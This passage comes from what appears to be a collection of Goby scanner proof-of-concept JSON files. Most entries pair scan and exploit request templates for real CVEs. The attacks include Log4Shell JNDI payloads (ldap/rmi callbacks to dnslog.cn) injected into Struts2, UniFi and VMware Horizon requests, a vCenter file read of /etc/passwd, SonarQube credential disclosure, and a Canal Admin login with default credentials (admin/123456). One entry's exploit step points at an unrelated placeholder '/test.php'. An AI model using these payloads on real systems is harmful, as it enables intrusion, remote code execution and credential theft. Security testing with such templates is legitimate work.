"==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "\"name\":\"admin\",\"password\":\"", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/", 66 | "follow_redirect": false, 67 | "header": null, 68 | "data_type": "text", 69 | "data": "", 70 | "set_variable": [] 71 | }, 72 | "ResponseTest": { 73 | "type": "group", 74 | "operation": "AND", 75 | "checks": [ 76 | { 77 | "type": "item", 78 | "variable": "$code", 79 | "operation": "==", 80 | "value": "200", 81 | "bz": "" 82 | }, 83 | { 84 | "type": "item", 85 | "variable": "$body", 86 | "operation": "contains", 87 | "value": "\"name\":\"admin\",\"password\":\"", 88 | "bz": "" 89 | } 90 | ] 91 | }, 92 | "SetVariable": [ 93 | "output|lastbody|regex|var persons (.*)}];" 94 | ] 95 | } 96 | ], 97 | "PostTime": "2021-12-06 16:14:12", 98 | "GobyVersion": "1.9.310" 99 | } -------------------------------------------------------------------------------- /SonarQube_unauth_CVE_2020_27986.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SonarQube unauth CVE-2020-27986", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"SonarQube\"", 8 | "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", 9 | "Product": "SonarQube", 10 | "Homepage": "https://www.sonarqube.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": 
"GET", 28 | "uri": "/api/settings/values", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "sonaranalyzer-cs.nuget.packageVersion", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "sonar.core.id", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-29 15:03:58", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /Struts2_Log4Shell_CVE_2021_44228_1.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Struts2 Log4Shell CVE-2021-44228 (1)", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "app=\"Struts2\"", 8 | "Description": "Struts2 Showcase(2.5.27) 存在log4j命令执行漏洞,向/struts2-showcase/token/transfer4.action地址发送数据struts.token.name触发。", 9 | "Product": "Struts2", 10 | "Homepage": "https://struts.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:rmi://xxxxdnslog.cn/tes}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": 
"text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/struts2-showcase/token/transfer4.action", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "struts.token.name='${jndi:rmi://{{{dnstest}}}/tes}'", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [ 72 | { 73 | "type": "item", 74 | "variable": "$code", 75 | "operation": "==", 76 | "value": "200", 77 | "bz": "" 78 | } 79 | ] 80 | }, 81 | "SetVariable": [ 82 | "output|lastbody|regex|" 83 | ] 84 | }, 85 | { 86 | "Request": { 87 | "method": "GET", 88 | "uri": "http://www.dnslog.cn/getrecords.php", 89 | "follow_redirect": false, 90 | "header": null, 91 | "data_type": "text", 92 | "data": "", 93 | "set_variable": [] 94 | }, 95 | "ResponseTest": { 96 | "type": "group", 97 | "operation": "AND", 98 | "checks": [ 99 | { 100 | "type": "item", 101 | "variable": "$code", 102 | "operation": "==", 103 | "value": "200", 104 | "bz": "" 105 | }, 106 | { 107 | "type": "item", 108 | "variable": "$body", 109 | "operation": "contains", 110 | "value": "{{{dnstest}}}", 111 | "bz": "" 112 | } 113 | ] 114 | }, 115 | "SetVariable": [ 116 | "output|lastbody|regex|" 117 | ] 118 | } 119 | ], 120 | "ExploitSteps": [ 121 | "AND", 122 | { 123 | "Request": { 124 | "method": "POST", 125 | "uri": "/struts2-showcase/token/transfer4.action", 126 | "follow_redirect": false, 127 | "header": null, 128 | "data_type": "text", 129 | "data": "struts.token.name='{{{cmd}}}'", 130 | "set_variable": [] 131 | }, 132 | "ResponseTest": { 133 | "type": "group", 134 | "operation": "AND", 135 | "checks": [ 136 | { 
137 | "type": "item", 138 | "variable": "$code", 139 | "operation": "==", 140 | "value": "200", 141 | "bz": "" 142 | } 143 | ] 144 | }, 145 | "SetVariable": [ 146 | "output|lastbody|regex|" 147 | ] 148 | } 149 | ], 150 | "PostTime": "2021-12-22 16:09:42", 151 | "GobyVersion": "1.9.310" 152 | } -------------------------------------------------------------------------------- /Struts2_Log4Shell_CVE_2021_44228_3.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Struts2 Log4Shell CVE-2021-44228 (3)", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "app=\"Struts2\"", 8 | "Description": "Struts2 struts2-showcase DefaultActionMapper.java存在log4j漏洞,在url中附带payload即可利用。", 9 | "Product": "Struts2", 10 | "Homepage": "https://struts.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "$%7Bjndi:ldap://xxxxdnslog.cn/tea%7D/" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "GET", 61 | "uri": "/struts2-showcase/$%7Bjndi:ldap://{{{dnstest}}}/tea%7D/", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "", 66 | 
"set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "GET", 117 | "uri": "/struts2-showcase/{{{cmd}}}", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [ 128 | { 129 | "type": "item", 130 | "variable": "$code", 131 | "operation": "==", 132 | "value": "200", 133 | "bz": "" 134 | } 135 | ] 136 | }, 137 | "SetVariable": [ 138 | "output|lastbody||" 139 | ] 140 | } 141 | ], 142 | "PostTime": "2021-12-24 10:43:02", 143 | "GobyVersion": "1.9.310" 144 | } -------------------------------------------------------------------------------- /UniFi_Network_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "UniFi Network Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "( title=\"UniFi Network\")", 8 | "Description": "UniFi Network 存在log4j漏洞。", 9 | "Product": "UniFi Network", 10 | "Homepage": "https://help.ui.com.cn/", 
11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://dnslog.cn/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/api/login", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "{\"username\":\"admin\",\"password\":\"lolwat\",\"remember\":\"${jndi:ldap://{{{dnstest}}}/tea}\",\"strict\":true}", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 
| ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "POST", 117 | "uri": "/api/login", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "{\"username\":\"admin\",\"password\":\"lolwat\",\"remember\":\"{{{cmd}}}\",\"strict\":true}", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [] 128 | }, 129 | "SetVariable": [ 130 | "output|lastbody|regex|" 131 | ] 132 | } 133 | ], 134 | "PostTime": "2022-01-11 14:43:16", 135 | "GobyVersion": "1.9.320" 136 | } -------------------------------------------------------------------------------- /VMWare_Horizon_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "VMWare Horizon Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "title=\"VMware Horizon\"", 8 | "Description": "VMWare Horizon 存在log4j漏洞。", 9 | "Product": "VMWare Horizon", 10 | "Homepage": "https://www.vmware.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://dnslog.cn/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": 
"==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "GET", 61 | "uri": "/portal/info.jsp", 62 | "follow_redirect": false, 63 | "header": { 64 | "Accept-Language": "${jndi:ldap://{{{dnstest}}}/tea}" 65 | }, 66 | "data_type": "text", 67 | "data": "", 68 | "set_variable": [] 69 | }, 70 | "ResponseTest": { 71 | "type": "group", 72 | "operation": "AND", 73 | "checks": [] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|" 77 | ] 78 | }, 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "http://www.dnslog.cn/getrecords.php", 83 | "follow_redirect": false, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "==", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "{{{dnstest}}}", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "ExploitSteps": [ 115 | "AND", 116 | { 117 | "Request": { 118 | "method": "GET", 119 | "uri": "/portal/info.jsp", 120 | "follow_redirect": false, 121 | "header": { 122 | "Accept-Language": "{{{cmd}}}" 123 | }, 124 | "data_type": "text", 125 | "data": "", 126 | "set_variable": [] 127 | }, 128 | "ResponseTest": { 129 | "type": "group", 130 | "operation": "AND", 131 | "checks": [] 132 | }, 133 | "SetVariable": [ 134 | "output|lastbody|regex|" 135 | ] 136 | } 137 | ], 138 | "PostTime": "2022-01-06 10:19:34", 139 | "GobyVersion": "1.9.320" 140 | } -------------------------------------------------------------------------------- /VMware_vCenter_v7.0.2_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | 
{ 2 | "Name": "VMware vCenter v7.0.2 Arbitrary File Read", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "app=\"VMware-vCenter\"", 8 | "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", 9 | "Product": "VMware-vCenter", 10 | "Homepage": "https://www.vmware.com/products/vcenter-server.html", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/l0ggg/VMware_vCenter" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "root:x:", 57 | "bz": "" 58 | }, 59 | { 60 | "type": "item", 61 | "variable": "$body", 62 | "operation": "contains", 63 | "value": "bin:x:", 64 | "bz": "" 65 | } 66 | ] 67 | }, 68 | "SetVariable": [ 69 | "output|lastbody|regex|" 70 | ] 71 | } 72 | ], 73 | "ExploitSteps": [ 74 | "AND", 75 | { 76 | "Request": { 77 | "method": "GET", 78 | "uri": "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://{{{Path}}}", 79 | "follow_redirect": false, 80 | "header": null, 81 | "data_type": "text", 82 | "data": "", 
83 | "set_variable": [] 84 | }, 85 | "ResponseTest": { 86 | "type": "group", 87 | "operation": "AND", 88 | "checks": [ 89 | { 90 | "type": "item", 91 | "variable": "$code", 92 | "operation": "==", 93 | "value": "200", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-12-02 18:50:55", 104 | "GobyVersion": "1.9.310" 105 | } -------------------------------------------------------------------------------- /YAPI_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "YAPI RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", 8 | "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开放注册,会导致攻击者注册后执行任意命令。", 9 | "Product": "YAPI", 10 | "Homepage": "https://github.com/YMFE/yapi", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/api/user/reg", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "禁止注册,请联系管理员", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "邮箱不能为空", 58 | "bz": "" 59 | } 60 | ] 
61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-12-01 20:34:40", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /alibaba_canal_default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "alibaba canal default password", 3 | "Level": "3", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", 8 | "Description": "Canal Admin (the web console of alibaba canal) ships with a built-in default account admin / 123456. If the password has not been changed, a POST to /api/v1/user/login with those credentials is answered with code 20000 and a token, giving the attacker a valid Canal Admin session. The first scan step only fingerprints the login endpoint (an empty POST that leaks the controller class name UserController.login); the second step performs the actual default-credential login.", 9 | "Product": "alibaba canal (Canal Admin)", 10 | "Homepage": "https://github.com/alibaba/canal", 11 | "Author": "aetkrad", 12 | "Impact": "A remote attacker can log in with the default admin account and use it to control the Canal Admin console and the canal instances it manages.", 13 | "Recommendation": "Change the default admin password of Canal Admin immediately after deployment.", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "POST", 26 | "uri": "/api/v1/user/login", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "com.alibaba.otter.canal.admin.controller.UserController.login", 49 | "bz": "" 50 | } 51 | ] 52 | }, 53 | "SetVariable": [ 54 | "output|lastbody|regex|" 55 | ] 56 | }, 57 | { 58 | "Request": { 59 | "method": "POST", 60 | "uri": "/api/v1/user/login", 61 | "follow_redirect": false, 62 | "header": { 63 | "Content-Type": "application/json" 64 | }, 65 | "data_type": "text", 66 | "data": "{\"username\":\"admin\",\"password\":\"123456\"}", 67 | "set_variable": [] 68 |
}, 69 | "ResponseTest": { 70 | "type": "group", 71 | "operation": "AND", 72 | "checks": [ 73 | { 74 | "type": "item", 75 | "variable": "$code", 76 | "operation": "==", 77 | "value": "200", 78 | "bz": "" 79 | }, 80 | { 81 | "type": "item", 82 | "variable": "$body", 83 | "operation": "contains", 84 | "value": "{\"code\":20000,", 85 | "bz": "\"data\":{\"token\"" 86 | } 87 | ] 88 | }, 89 | "SetVariable": [ 90 | "output|lastbody|regex|" 91 | ] 92 | } 93 | ], 94 | "ExploitSteps": [ 95 | "AND", 96 | { 97 | "Request": { 98 | "method": "GET", 99 | "uri": "/test.php", 100 | "follow_redirect": true, 101 | "header": null, 102 | "data_type": "text", 103 | "data": "", 104 | "set_variable": [] 105 | }, 106 | "ResponseTest": { 107 | "type": "group", 108 | "operation": "AND", 109 | "checks": [ 110 | { 111 | "type": "item", 112 | "variable": "$code", 113 | "operation": "==", 114 | "value": "200", 115 | "bz": "" 116 | }, 117 | { 118 | "type": "item", 119 | "variable": "$body", 120 | "operation": "contains", 121 | "value": "test", 122 | "bz": "" 123 | } 124 | ] 125 | }, 126 | "SetVariable": [ 127 | "output|lastbody|regex|" 128 | ] 129 | } 130 | ], 131 | "PostTime": "2021-10-31 17:23:05", 132 | "GobyVersion": "1.8.302" 133 | } --------------------------------------------------------------------------------
